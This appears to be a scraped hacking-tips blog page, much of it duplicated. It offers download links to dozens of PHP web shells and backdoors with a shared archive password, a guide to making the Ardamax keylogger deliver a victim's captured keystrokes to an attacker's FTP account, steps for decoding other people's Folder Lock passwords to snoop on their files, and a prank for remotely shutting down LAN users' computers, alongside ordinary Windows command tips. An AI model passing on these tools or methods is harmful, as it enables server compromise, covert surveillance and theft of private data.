http://www.4shared.com/file/oYjj9Hmz/R57...Shell.html
R57_New_Year_Edition_Shell
http://www.4shared.com/file/Tg4CHDbs/R57...Shell.html
R57_ORIGINAL_Shell
http://www.4shared.com/file/dCTc26AN/R57...Shell.html
Remview_Shell
http://www.4shared.com/file/vhwb_KQj/Remview_Shell.html
Root_Access_Shell
http://www.4shared.com/file/3Hy_Lfkt/Roo...Shell.html
S72_Shell
http://www.4shared.com/file/LGpkuZ8U/S72_Shell.htmlhttp://
s101
http://www.4shared.com/file/9zQDaQXz/s101.html
Safe_Mode_Bypass_PHP_442__512_
http://www.4shared.com/file/H347Kn5s/Saf..._512_.html
SIM_Attacker_Shell
http://www.4shared.com/file/lVoQbZeQ/SIM...Shell.html
simple_php_backdoor
http://www.4shared.com/file/sgfSLqfd/sim...kdoor.html
SnIpEr_SA_Shell
http://www.4shared.com/file/72OCGzXr/SnI...Shell.html
StAkeR__Shell
http://www.4shared.com/file/iuy8xvPp/StAkeR__Shell.html
Stres_Bypass_Shell
http://www.4shared.com/file/kWn2TYhL/Str...Shell.html
PHP Shell is a shell wrapped in a PHP script. It’s a tool you can use to execute arbitrary shell-commands or browse the filesystem on your remote webserver. This replaces, to a degree, a normal telnet connection, and to a lesser degree a SSH connection.
You use it for administration and maintenance of your website, which is often much easier to do if you can work directly on the server. For example, you could use PHP Shell to unpack and move big files around. All the normal command line programs like ps, free, du, df, etc… can be used.
Download PHP Shells.
Password for all links :- rocks
_GsC__shell
http://www.4shared.com/file/yX1cvplV/_GsC__shell.html
0x00_PHP_shell
http://www.4shared.com/file/_VKM9keP/0x0...shell.html
_Andr3a92__Sh3ll
http://www.4shared.com/file/tp1BeFXQ/_An...h3ll_.html
__Cod3rZ_Shell__
http://www.4shared.com/file/DxAxWgWL/__C...ell__.html
Ajax_PHP_Command_Shell
http://www.4shared.com/file/wZjZMcxJ/Aja...Shell.html
Anti_Chat_Shell
http://www.4shared.com/file/3Z2B2nrx/Ant...Shell.html
AYT_Shell
http://www.4shared.com/file/bqCBnhbT/AYT_Shell.html
Azrail_Php_Shell
http://www.4shared.com/file/fdWWiC27/Azr...Shell.html
Backup_SQL_Shell
http://www.4shared.com/file/AxgPSH0u/Bac...Shell.html
Bl0od3r_Priv8_Shell
http://www.4shared.com/file/CGovUJF1/Bl0...Shell.html
Bypass_User
http://www.4shared.com/file/HqWSkCv8/Bypass_User.html
C99_Original_Shell
http://www.4shared.com/file/WP0GpDIn/C99...Shell.html
C99_Original_Shell__Underdetec
http://www.4shared.com/file/RNftEbFr/C99...detec.html
C99_Saldiriorg_version
http://www.4shared.com/file/Io6wN-VJ/C99...rsion.html
C100_Yarakam_Modified_Shell
http://www.4shared.com/file/47WPrSe-/C10...Shell.html
CGI_Telnet
http://www.4shared.com/file/VI5YA-wG/CGI_Telnet.html
CShell
http://www.4shared.com/file/KisHKKYc/CShell.html
CTT_Shell
http://www.4shared.com/file/nCmCitXR/CTT_Shell.html
Cyber_Shell
http://www.4shared.com/file/7omydtGQ/Cyber_Shell.html
Dark-Shell
http://www.4shared.com/file/jnEEI3rY/Dark-Shell.html
DC3_Shell__Priv8
http://www.4shared.com/file/q_0GoDsn/DC3...riv8_.html
Dive_Shell
http://www.4shared.com/file/tfwyFvGr/Dive_Shell.html
DTool_Pro_Shell
http://www.4shared.com/file/-auj9Kmj/DTo...Shell.html
DX_Shell
http://www.4shared.com/file/jqlEXYbM/DX_Shell.html
Erne_Safe_Mode_Bypass_Shel
http://www.4shared.com/file/9fKu9ypj/Ern...Shell.html
Fake_email Shell
http://www.4shared.com/file/8KGZei36/Fake_email.html
G00nShell
http://www.4shared.com/file/BpiG9rcz/G00nShell.html
GFS_Shell
http://www.4shared.com/file/E_f9yH5p/GFS_Shell.html
GNY_Shell
http://www.4shared.com/file/Vss8Cu5a/GNY_Shell.html
H4NTU1_Shell
http://www.4shared.com/file/VYCyexWQ/H4NTU1_Shell.html
Heykir_Shell
http://www.4shared.com/file/88BV2gwN/Heykir_Shell.html
HiddenShell
http://www.4shared.com/file/YP8LaVZP/HiddenShell.html
iMHaP_FTP_Shell
http://www.4shared.com/file/vl1lhnTl/iMH...Shell.html
Iron1_Shell
http://www.4shared.com/file/kqP5jQiC/Iron1_Shell.html
http://www.4shared.com/file/PHy19Lhz/Iron_Shell.html
JsBack_-_Shell_Backdoor
http://www.4shared.com/file/LcjIeYYA/JsB...kdoor.html
JSP_Shell
http://www.4shared.com/file/c7qoc0D6/JSP_Shell.html
Kacak_Shell
http://www.4shared.com/file/hQdJTadf/Kacak_Shell.html
KADot_Shell
[/size][/size]http://www.4shared.com/file/-6mBbdbQ/KADot_Shell.html
Lama_Shell
http://www.4shared.com/file/UPHWmy28/Lama_Shell.html
Liz0zim_Shell
http://www.4shared.com/file/OB7nOU9J/Liz0zim_Shell.html
Load_Shell
http://www.4shared.com/file/XIE5ANyW/Load_Shell.html
lostDC_shell
http://www.4shared.com/file/gn2_vnkp/lostDC_shell.html
Mackers_Private_PHPShell
http://www.4shared.com/file/UubJhaJ7/Mac...Shell.html
Moroccan_Spamers_Shell
http://www.4shared.com/file/1Nk_AcAG/Mor...Shell.html
MyShell_Shell
http://www.4shared.com/file/JlEIt3IU/MyShell_Shell.html
MySQL_Interface_Shell
http://www.4shared.com/file/WR7mQEDK/MyS...Shell.html
N3fa5t1cA_Sh3ll
http://www.4shared.com/file/4W0g887i/N3f...Sh3ll.html
N3tShell_Emp3ror_Undetectable
http://www.4shared.com/file/oU-2A_xW/N3t...able_.html
N_Shell
http://www.4shared.com/file/OtOUZ5Lw/N_Shell.html
NCC_Shell
http://www.4shared.com/file/OmgPsHuo/NCC_Shell.html
Network_File_Manager_PHP_Shell
http://www.4shared.com/file/V34e7DRy/Net...Shell.html
Nexpl0rer_Shell
http://www.4shared.com/file/RtwOsvuo/Nex...Shell.html
Nix_Remote_Shell
http://www.4shared.com/file/86Of7PRy/Nix...Shell.html
NST_Shell
http://www.4shared.com/file/0UqJ4hZ3/NST_Shell.html
okno_Shell
http://www.4shared.com/file/vN8Q1-eN/okno_Shell.html
OnBoomShell
http://www.4shared.com/file/KnpXFJMX/OnBoomShell.html
PH_Vayv_Shell
http://www.4shared.com/file/vbf77aPi/PH_Vayv_Shell.html
PHANTASMA_Shell
http://www.4shared.com/file/JExrHLos/PHA...Shell.html
PHP_black_shell_that_pwnz_C99
http://www.4shared.com/file/WPpjJJSY/PHP...z_C99.html
PHP_Bypass_Shell
http://www.4shared.com/file/zfiuPrpu/PHP...Shell.html
PHP_Include_With_Shell
http://www.4shared.com/file/WntNAeua/PHP...Shell.html
PHP_Inj_Shell
http://www.4shared.com/file/j7qhZhS2/PHP_Inj_Shell.html
http://www.4shared.com/file/tRJ2E4xb/PHP...Shell.html
http://www.4shared.com/file/1RwfnLln/PHP...Shell.html
R57_IFX_Modified_Shell
http://www.4shared.com/file/FAwRif1l/R57...Shell.html
R57_Kartal_Modified_Shell
http://www.4shared.com/file/JDaMOZZZ/R57...Shell.html
R57_Mohajer22_Shell
http://www.4shared.com/file/oYjj9Hmz/R57...Shell.html
R57_New_Year_Edition_Shell
http://www.4shared.com/file/Tg4CHDbs/R57...Shell.html
R57_ORIGINAL_Shell
http://www.4shared.com/file/dCTc26AN/R57...Shell.html
Remview_Shell
http://www.4shared.com/file/vhwb_KQj/Remview_Shell.html
Root_Access_Shell
http://www.4shared.com/file/3Hy_Lfkt/Roo...Shell.html
S72_Shell
http://www.4shared.com/file/LGpkuZ8U/S72_Shell.htmlhttp://
s101
http://www.4shared.com/file/9zQDaQXz/s101.html
Safe_Mode_Bypass_PHP_442__512_
http://www.4shared.com/file/H347Kn5s/Saf..._512_.html
SIM_Attacker_Shell
http://www.4shared.com/file/lVoQbZeQ/SIM...Shell.html
simple_php_backdoor
http://www.4shared.com/file/sgfSLqfd/sim...kdoor.html
SnIpEr_SA_Shell
http://www.4shared.com/file/72OCGzXr/SnI...Shell.html
StAkeR__Shell
http://www.4shared.com/file/iuy8xvPp/StAkeR__Shell.html
Stres_Bypass_Shell
http://www.4shared.com/file/kWn2TYhL/Str...Shell.html
POPULAR COMMAND PROMPT TRICKS
Save A List of Files to a Text File by Extension
dir *.ext /s /b > files.txt
This command line will create a file called files.txt. When you open this file, there will be a complete list of all the files in that directory and all subdirectories with the .ext extension. You can then open up this text file in any text editor and work this the information.By changing the ext part, you can select different files. For example, if you wanted to list all of the PDF documents, you would type:
dir *.pdf /s /b > files.txt
Get Your IP Address Information
ipconfig /all
This will retrieve a pile of information about your network connection and IP information. From this command, you can get:
Host Name
Primary DNS Suffix
Node Type
IP Routing Enabled
WINS Proxy Enabled
DNS Suffix Search List
Connection-specific DNS Suffix
Network Adapter Description
Physical (MAC) Address
DHCP Enabled
IP Address
Subnet Mask
Default Gateway
DNS Servers
Get Installed Driver Information
driverquery
It can be very useful when troubleshooting to know what drivers are installed on a system. This command will give you a complete listing of the drivers and when they were installed.
Copy Files Via Infrared Port
irftp filename.ext
This will fire up the Wireless Link dialog so that you can copy the specified file via an infrared port.
Find Files Opened By Network Users
openfiles /query
If you are running a system and you want to know who has files open on your computer, this command will provide you a list of those users and the files that they have open.
Note: If you get an error saying The system global flag ‘maintain objects list’ needs to be enabled to see local opened files, you can fix this issue by typing openfiles /local on. You will have to reboot the system but it will resolve the issue.
Monitor Port Activity
netstat -a 30
This will show you all of the TCP/IP ports that are being used on your system and what they are connecting to (or being connected from). It will continue to monitor these ports and refresh the information every 30 seconds. You can change the refresh rate by changing the number at the end of the command.
Recover Information From A Corrupt File
recover filename.ext
If you have a disk with damaged sectors, you can attempt to recover as much information as possible from the damaged file. Data that is not damaged can be retrieved but data in damaged sectors will be lost.
Defragment Remote Computer
rexec remotePC defrag C: /F
This command used the rexec command to force a defragment of the C: drive on the computer named remotePC. You can use whatever you want to for the command (I just used defrag C: /F as an example). This is very useful for remote maintenance.
Retrieve Detailed System Information
systeminfo
With this command, you can retrieve the following information:
Host Name
OS Name
OS Version
OS Manufacturer
OS Configuration
OS Build Type
Registered Owner
Registered Organization
Product ID
Original Install Date
System Up Time
System Manufacturer
System Model
System type
Processor(s)
BIOS Version
Windows Directory
System Directory
Boot Device
System Locale
Input Locale
Time Zone
Total Physical Memory
Available Physical Memory
Virtual Memory Max Size
Virtual Memory Available
Virtual Memory In Use
Page File Location(s)
Domain
Logon Server
Hotfix(s)
NetWork Card(s)
Automatically Defragment C: Daily
schtasks /create /tn "Defrag C" /tr "defrag c: /f" /sc daily /st 23:00:00 /ru "System"
This will set your computer to automatically perform a complete defrag of the C: drive each day at 11:00:00 PM (23:00:00). It does this by creating a scheduled task called Defrag C. It will run this command under the computer’s system account.
Map A Drive Letter to a Folder
subst W: C:\windows
Sometimes, your directory structure can get pretty deep and complicated. You can simplify this a bit by mapping a drive letter to commonly used folders. In the example that I have given, this will create a drive letter W: and map it to the C:\windows directory. Then, whenever you go into My Computer, you will see a W: drive and when you browse to it, it will automatically take you to the contents of the C:\windows folder.
You can do this with any unused drive letter and any folder that exists on your system.
List All Tasks Running On The Computer
tasklist
It’s always good to know what is running on your system. This is the command line version of the processes tab in Taks Manager.
Kill A Program
taskkill /im programname.exe /f
If, when using the tasklist command, you discover that there is something running you just want killed. This is the way to do it! Just note the program name and use it in place of programname.exe.
Reboot a Remote Computer
shutdown -r -f -m \\remotePC -c "System will be rebooted in 20 seconds"
Sometimes, you just need to reboot a system. This will do it remotely and give the user a 20 second warning.
Save A List of Files to a Text File by Extension
dir *.ext /s /b > files.txt
This command line will create a file called files.txt. When you open this file, there will be a complete list of all the files in that directory and all subdirectories with the .ext extension. You can then open up this text file in any text editor and work this the information.By changing the ext part, you can select different files. For example, if you wanted to list all of the PDF documents, you would type:
dir *.pdf /s /b > files.txt
Get Your IP Address Information
ipconfig /all
This will retrieve a pile of information about your network connection and IP information. From this command, you can get:
Host Name
Primary DNS Suffix
Node Type
IP Routing Enabled
WINS Proxy Enabled
DNS Suffix Search List
Connection-specific DNS Suffix
Network Adapter Description
Physical (MAC) Address
DHCP Enabled
IP Address
Subnet Mask
Default Gateway
DNS Servers
Get Installed Driver Information
driverquery
It can be very useful when troubleshooting to know what drivers are installed on a system. This command will give you a complete listing of the drivers and when they were installed.
Copy Files Via Infrared Port
irftp filename.ext
This will fire up the Wireless Link dialog so that you can copy the specified file via an infrared port.
Find Files Opened By Network Users
openfiles /query
If you are running a system and you want to know who has files open on your computer, this command will provide you a list of those users and the files that they have open.
Note: If you get an error saying The system global flag ‘maintain objects list’ needs to be enabled to see local opened files, you can fix this issue by typing openfiles /local on. You will have to reboot the system but it will resolve the issue.
Monitor Port Activity
netstat -a 30
This will show you all of the TCP/IP ports that are being used on your system and what they are connecting to (or being connected from). It will continue to monitor these ports and refresh the information every 30 seconds. You can change the refresh rate by changing the number at the end of the command.
Recover Information From A Corrupt File
recover filename.ext
If you have a disk with damaged sectors, you can attempt to recover as much information as possible from the damaged file. Data that is not damaged can be retrieved but data in damaged sectors will be lost.
Defragment Remote Computer
rexec remotePC defrag C: /F
This command used the rexec command to force a defragment of the C: drive on the computer named remotePC. You can use whatever you want to for the command (I just used defrag C: /F as an example). This is very useful for remote maintenance.
Retrieve Detailed System Information
systeminfo
With this command, you can retrieve the following information:
Host Name
OS Name
OS Version
OS Manufacturer
OS Configuration
OS Build Type
Registered Owner
Registered Organization
Product ID
Original Install Date
System Up Time
System Manufacturer
System Model
System type
Processor(s)
BIOS Version
Windows Directory
System Directory
Boot Device
System Locale
Input Locale
Time Zone
Total Physical Memory
Available Physical Memory
Virtual Memory Max Size
Virtual Memory Available
Virtual Memory In Use
Page File Location(s)
Domain
Logon Server
Hotfix(s)
NetWork Card(s)
Automatically Defragment C: Daily
schtasks /create /tn "Defrag C" /tr "defrag c: /f" /sc daily /st 23:00:00 /ru "System"
This will set your computer to automatically perform a complete defrag of the C: drive each day at 11:00:00 PM (23:00:00). It does this by creating a scheduled task called Defrag C. It will run this command under the computer’s system account.
Map A Drive Letter to a Folder
subst W: C:\windows
Sometimes, your directory structure can get pretty deep and complicated. You can simplify this a bit by mapping a drive letter to commonly used folders. In the example that I have given, this will create a drive letter W: and map it to the C:\windows directory. Then, whenever you go into My Computer, you will see a W: drive and when you browse to it, it will automatically take you to the contents of the C:\windows folder.
You can do this with any unused drive letter and any folder that exists on your system.
List All Tasks Running On The Computer
tasklist
It’s always good to know what is running on your system. This is the command line version of the processes tab in Taks Manager.
Kill A Program
taskkill /im programname.exe /f
If, when using the tasklist command, you discover that there is something running you just want killed. This is the way to do it! Just note the program name and use it in place of programname.exe.
Reboot a Remote Computer
shutdown -r -f -m \\remotePC -c "System will be rebooted in 20 seconds"
Sometimes, you just need to reboot a system. This will do it remotely and give the user a 20 second warning.
CHAT WITH COMMAND PROMPT
If you want a private chat with a friend or client on your Network, you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:
MESSENGER
User: 56.108.104.107
Message: Hi
Now all you need to do is press "Enter", and start chatting!
Hi friends, if u are getting confused,
I'll explain you how to do it![/b]
open notepad
type this
@ echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
now click on file
click on save as
and then give it the name messenger.bat
click save
now goto control panel
click on administrative tools(switch to classic view)
then click on services
then find messenger service
open it
you'll see startup type which would be disabled
so click on that and select manual
now press the start button and apply
now do the same on the remote computer
until this service is activated on that pc, you won't be able to use this
now click on that file you made
type the ip
type the message
and enter
there you go!
If you want a private chat with a friend or client on your Network, you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:
MESSENGER
User: 56.108.104.107
Message: Hi
Now all you need to do is press "Enter", and start chatting!
Hi friends, if u are getting confused,
I'll explain you how to do it![/b]
open notepad
type this
@ echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
now click on file
click on save as
and then give it the name messenger.bat
click save
now goto control panel
click on administrative tools(switch to classic view)
then click on services
then find messenger service
open it
you'll see startup type which would be disabled
so click on that and select manual
now press the start button and apply
now do the same on the remote computer
until this service is activated on that pc, you won't be able to use this
now click on that file you made
type the ip
type the message
and enter
there you go!
SHUT DOWN ANY PC ON YOUR LAN USING COMMAND PROMPT
This trick will shutdown a selected pc from Your LAN network. You can apply this trick in your office or school.. but i take no responsibilities fro any action. Its just for fun. Here is how to use this trick :
1. Go to Start > Run and type in cmd
2. You will see the command prompt window . Now type in this command line.
shutdown.exe -i
And hit Enter. You will see remote shutdown Window. If you know someone’s IP on a computer in your Local Area network, type in their IP Address after clicking the add button.
3. After entering the IP Address click OK . Now watch the person’s face as their computer shuts down.
Some friends have asked me that they got Access Denied error for remote shutdown. Add the user with the privilege to force a remote shutdown on the computer you are about to Shutdown.To do this go to control panel > Administrative Tools > Local Security Settings. Now go to Security Settings > Local Policies > User Rights Assignment. Double-click on Force shutdown from a remote system in the right pane and Click on Add User or Group. Add the computer that runs the remote shutdown command.
Or you can do this go the computer you are about to Shutdown
a) Go to Start > Run > type in Regedit in the dialog box and hit enter
b) Go to My Computer/HKEY_LOCAL_MACHINE /system/currentcontrolset/control/lsa
c) Find “forceguest” in the right pane Double click on it to modify This entry change the value from “1″ entry to “0″
1. Go to Start > Run and type in cmd
2. You will see the command prompt window . Now type in this command line.
shutdown.exe -i
And hit Enter. You will see remote shutdown Window. If you know someone’s IP on a computer in your Local Area network, type in their IP Address after clicking the add button.
3. After entering the IP Address click OK . Now watch the person’s face as their computer shuts down.
Some friends have asked me that they got Access Denied error for remote shutdown. Add the user with the privilege to force a remote shutdown on the computer you are about to Shutdown.To do this go to control panel > Administrative Tools > Local Security Settings. Now go to Security Settings > Local Policies > User Rights Assignment. Double-click on Force shutdown from a remote system in the right pane and Click on Add User or Group. Add the computer that runs the remote shutdown command.
Or you can do this go the computer you are about to Shutdown
a) Go to Start > Run > type in Regedit in the dialog box and hit enter
b) Go to My Computer/HKEY_LOCAL_MACHINE /system/currentcontrolset/control/lsa
c) Find “forceguest” in the right pane Double click on it to modify This entry change the value from “1″ entry to “0″
how to use a key logger
Recieving logs of a keylogger infected computer via ftp
Requirements :
1) Ardamax Keylogger
2) An Account on drivehq ( Make one its free )
Procedure
1) Create an account oh drivehq.com its easy to make an account and its all free
2) Login to your drivehq account and click on new folder as shown in the picture
3) Right click on the icon of ardamax kelogger at the bottom right of the taskbar and click on options
4) Now you have to click on Delivery option which has a feature of ftp and enter the information as shown in the picture ... where u will be givin ur path on drive hq
PS enter the login pass of drivehq.com the account one which u just made
Once you enter all the credentials properly click on test to check wether the connection is successfully established or no
5) Then go to the Control to do the Log settings as to how u want the logs to come ... here you have to click on the delivery method and select ftp so tht the logs are sent on ftp
6) click ok and ardamax will minimize ...
VOILA ALL THE LOGS WILL GO DIRECTLY TO THE drivehq account you made using ftp .... cheers have fun
comments appreciated
Requirements :
1) Ardamax Keylogger
2) An Account on drivehq ( Make one its free )
Procedure
1) Create an account oh drivehq.com its easy to make an account and its all free
2) Login to your drivehq account and click on new folder as shown in the picture
3) Right click on the icon of ardamax kelogger at the bottom right of the taskbar and click on options
4) Now you have to click on Delivery option which has a feature of ftp and enter the information as shown in the picture ... where u will be givin ur path on drive hq
PS enter the login pass of drivehq.com the account one which u just made
Once you enter all the credentials properly click on test to check wether the connection is successfully established or no
5) Then go to the Control to do the Log settings as to how u want the logs to come ... here you have to click on the delivery method and select ftp so tht the logs are sent on ftp
6) click ok and ardamax will minimize ...
VOILA ALL THE LOGS WILL GO DIRECTLY TO THE drivehq account you made using ftp .... cheers have fun
comments appreciated
Anti Keylogger Shield
Anti Keylogger Shield
Anti Keylogger Shield is a powerful, easy to use anti-spy software tool that prohibits operation of keyloggers, known or unknown, professional or custom made. Once installed, Anti Keylogger Shield will run silently in your System Tray, it will block the system mechanisms that are exploited by keyloggers, and will immediately start protecting your privacy. With Anti Key logger shield you can hide and protect your keystrokes from prying eyes.
Keep your Keystrokes PRIVATE!
Keyloggers are small spy programs, that record everything you type on the computer, including documents, emails, user names and passwords, and then either stores this information in a hidden place on your computer or sends it over the Internet to the person who infiltrated it.
Keyloggers can come in many forms, as emails, viruses, Trojan horses; from people who might try to invade your privacy and see what you are typing, or remote hackers, who might want to steel user names and passwords as you type them.
DOWNLOAD
Anti Keylogger Shield is a powerful, easy to use anti-spy software tool that prohibits operation of keyloggers, known or unknown, professional or custom made. Once installed, Anti Keylogger Shield will run silently in your System Tray, it will block the system mechanisms that are exploited by keyloggers, and will immediately start protecting your privacy. With Anti Key logger shield you can hide and protect your keystrokes from prying eyes.
Keep your Keystrokes PRIVATE!
Keyloggers are small spy programs, that record everything you type on the computer, including documents, emails, user names and passwords, and then either stores this information in a hidden place on your computer or sends it over the Internet to the person who infiltrated it.
Keyloggers can come in many forms, as emails, viruses, Trojan horses; from people who might try to invade your privacy and see what you are typing, or remote hackers, who might want to steel user names and passwords as you type them.
DOWNLOAD
Hack "folder lock" password
Hack "folder lock" password
Folder Lock is one of another folder protection that we can find between a hugh another software folder protection, but today we gonna hack the password of Folder Lock, not reseted but we will read it
This is how to work,
First open REGEDIT by typeing on RUN command, and go to the following path :[HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl]
"_pack"="this is encrypted password ~~~"
Ignore sign ~~~~ , example espxttbqfwpm~~~~~ it would be like this "espxttbqfwpm" after that begin to REVERSE the encrypted password in this case "espxttbqfwpm" to "mpwfqbttxpse" it means you bring the last word to the beggining and start to doing all that until all the encryted password you arrange.
the next we have to do is begin to move one character each to backward, here the example:
m become to l because the alphabet l is first letter before m,
p become to o coz o is the letter before p, and keep doing until all encrypted password you can read, in this tutorial the password --> espxttbqfwpm after decryted become --> lovepassword
Easy right , why not try by your self and begin to find porn or secret files that lock in other computer or laptop of your friend.
PS: I have not tested yet [as usuall ] coz I got alot to do, this trick I found on Indonesia forum with bahasa languange and has translate by me without losing the meaning idea, sorry for worst english.
Folder Lock is one of another folder protection that we can find between a hugh another software folder protection, but today we gonna hack the password of Folder Lock, not reseted but we will read it
This is how to work,
First open REGEDIT by typeing on RUN command, and go to the following path :[HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl]
"_pack"="this is encrypted password ~~~"
Ignore sign ~~~~ , example espxttbqfwpm~~~~~ it would be like this "espxttbqfwpm" after that begin to REVERSE the encrypted password in this case "espxttbqfwpm" to "mpwfqbttxpse" it means you bring the last word to the beggining and start to doing all that until all the encryted password you arrange.
the next we have to do is begin to move one character each to backward, here the example:
m become to l because the alphabet l is first letter before m,
p become to o coz o is the letter before p, and keep doing until all encrypted password you can read, in this tutorial the password --> espxttbqfwpm after decryted become --> lovepassword
Easy right , why not try by your self and begin to find porn or secret files that lock in other computer or laptop of your friend.
PS: I have not tested yet [as usuall ] coz I got alot to do, this trick I found on Indonesia forum with bahasa languange and has translate by me without losing the meaning idea, sorry for worst english.
Download Ebooks......!
Download Ebooks......!
bluetooth_hacking.zip (3.32 MB)
Download Link :- http://www.fileserve.com/file/VYynet2
password:- rocks
Hardware.Hacking.Projects.for.Around.Home.zip (5.80 MB)
Download Link :- http://www.fileserve.com/file/2sEQsZD
password :- rocks
4367dorks.zip (101.95 KB)
Download :- http://www.fileserve.com/file/Cg9aQn5
password :- rocks
Black Book.zip (3.97 MB)
Download :- http://www.fileserve.com/file/QUcx2V3
password :- rocks
Bufferoverflow-hackaholic.zip (590.52 KB)
Download :- http://www.fileserve.com/file/UKnhjgP
password :- rocks
Encryption Algorithms Explained.zip (166.01 KB)
Download :- http://www.fileserve.com/file/Drcgz9h
password :- rocks
Google as a hacking tool.zip (299.99 KB)
Download :- http://www.fileserve.com/file/VXHJdfB
password :- rocks
GPS hacking.zip (8.63 MB)
Download :- http://www.fileserve.com/file/Zfmwy7G
password :- rocks
Hacking BlackBerry.zip (4.04 MB)
Download :- http://www.fileserve.com/file/ARgxx9f
password :- rocks
Hacking Firefox.zip (10.85 MB)
Download :- http://www.fileserve.com/file/956UQNf
password :- rocks
Hacking Hand Book.zip (125.44 KB)
Download :- http://www.fileserve.com/file/fEc5bea
password :- rocks
Hacking VOIP.zip (16.41 MB)
Download :- http://www.fileserve.com/file/VynzGqQ
password :- rocks
Hacking.The.Next.Generation.Sep.2009_ddlworld.info.zip (6.89 MB)
Download :- http://www.fileserve.com/file/FpCaaxd
password :- rocks
Hacking_Wireless_Networks_For_Dummies.zip (8.00 MB)
Download :- http://www.fileserve.com/file/92ncV8c
password :- rocks
McGraw_Hill_Gray_Hat_Hacking_2nd.zip (8.50 MB)
Download :- http://www.fileserve.com/file/pMFPvXX
password :- rocks
The_Google_Hackers_Guide.zip (677.97 KB)
Download :- http://www.fileserve.com/file/QAThHFA
password :- rocks
Transparent_proxies_with_Squid_Proxy_Servers.zip (86.27 KB)
Download link :- http://www.fileserve.com/file/gM7farD
password :- rocks
Untold Windows Tips And Secrets.zip (181.00 KB)
Download :- http://www.fileserve.com/file/5XEP8y2
password :- rocks
bluetooth_hacking.zip (3.32 MB)
Download Link :- http://www.fileserve.com/file/VYynet2
password:- rocks
Hardware.Hacking.Projects.for.Around.Home.zip (5.80 MB)
Download Link :- http://www.fileserve.com/file/2sEQsZD
password :- rocks
4367dorks.zip (101.95 KB)
Download :- http://www.fileserve.com/file/Cg9aQn5
password :- rocks
Black Book.zip (3.97 MB)
Download :- http://www.fileserve.com/file/QUcx2V3
password :- rocks
Bufferoverflow-hackaholic.zip (590.52 KB)
Download :- http://www.fileserve.com/file/UKnhjgP
password :- rocks
Encryption Algorithms Explained.zip (166.01 KB)
Download :- http://www.fileserve.com/file/Drcgz9h
password :- rocks
Google as a hacking tool.zip (299.99 KB)
Download :- http://www.fileserve.com/file/VXHJdfB
password :- rocks
GPS hacking.zip (8.63 MB)
Download :- http://www.fileserve.com/file/Zfmwy7G
password :- rocks
Hacking BlackBerry.zip (4.04 MB)
Download :- http://www.fileserve.com/file/ARgxx9f
password :- rocks
Hacking Firefox.zip (10.85 MB)
Download :- http://www.fileserve.com/file/956UQNf
password :- rocks
Hacking Hand Book.zip (125.44 KB)
Download :- http://www.fileserve.com/file/fEc5bea
password :- rocks
Hacking VOIP.zip (16.41 MB)
Download :- http://www.fileserve.com/file/VynzGqQ
password :- rocks
Hacking.The.Next.Generation.Sep.2009_ddlworld.info.zip (6.89 MB)
Download :- http://www.fileserve.com/file/FpCaaxd
password :- rocks
Hacking_Wireless_Networks_For_Dummies.zip (8.00 MB)
Download :- http://www.fileserve.com/file/92ncV8c
password :- rocks
McGraw_Hill_Gray_Hat_Hacking_2nd.zip (8.50 MB)
Download :- http://www.fileserve.com/file/pMFPvXX
password :- rocks
The_Google_Hackers_Guide.zip (677.97 KB)
Download :- http://www.fileserve.com/file/QAThHFA
password :- rocks
Transparent_proxies_with_Squid_Proxy_Servers.zip (86.27 KB)
Download link :- http://www.fileserve.com/file/gM7farD
password :- rocks
Untold Windows Tips And Secrets.zip (181.00 KB)
Download :- http://www.fileserve.com/file/5XEP8y2
password :- rocks
FOLDER LOCK without any Software
FOLDER LOCK without any Software
*Copy the following codes :
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
* Now paste it in notepad.
* Change the "type your password here" with your password (Marked as bold in the above posted matter).
* Save it as batch file(with extension .bat).Any name will do.
* Now you see a batch file. Double click it to create a folder locker.
* A new folder named Locker would be formed at the same location.
* Now brings all the files you want to hide in the locker folder.
* Now double click the batch file to lock the folder namely Locker.
* If you want to unlock your files,double click the batch file again and you would be prompted for password.Enter the password and enjoy access to the folder.
just follow these steps....
1. first change the password in the batch file and save it.
2. then double click dat batch file. it will create a folder named "locker".
3. place the data in dat folder.
4. then again double click dat batch file. folder will be made hidden.
5. if u want to view dat data, double click batch file,it will prompt u for password,just enter passwod, folder will be shown.
*Copy the following codes :
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
